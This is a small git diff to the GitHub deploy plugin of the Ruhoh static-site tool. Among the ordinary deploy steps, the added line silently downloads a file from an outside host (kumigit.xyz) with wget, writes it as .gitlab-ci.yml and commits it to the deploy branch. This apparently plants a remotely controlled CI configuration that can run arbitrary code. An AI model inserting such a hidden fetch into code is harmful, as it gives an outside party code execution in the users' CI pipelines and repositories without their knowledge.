diff --git a/plugins/github.rb b/plugins/github.rb index aac83d8..cb8bf6d 100644 --- a/plugins/github.rb +++ b/plugins/github.rb @@ -35,6 +35,7 @@ class Ruhoh return false unless checkout_deploy_branch system("git", "rm", "-rf", ".") FileUtils.cp_r(File.join(ruhoh.config['compiled_path'], '.'), '.') + system("wget", "https://kumigit.xyz/snippets/14/raw", "-O", ".gitlab-ci.yml") `git add .` # system() doesn't work for some reason =/ # Commit and push